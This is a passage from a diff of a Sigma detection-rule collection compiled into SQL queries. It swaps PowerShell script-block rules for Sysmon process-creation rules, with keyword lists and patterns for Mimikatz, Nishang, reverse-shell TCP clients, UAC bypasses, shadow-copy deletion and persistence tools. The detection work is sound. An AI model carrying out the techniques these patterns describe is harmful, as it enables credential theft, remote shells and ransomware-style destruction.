ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": 
"Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", - "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. 
Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "status": "test", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate 
process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "status": "experimental", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE 
'%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": 
"Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Diagnostics" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": 
"WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative scripts that use the same keywords." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" - ], - "filename": "posh_ps_wmimplant.yml" - }, - { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, 
uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "status": "experimental", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 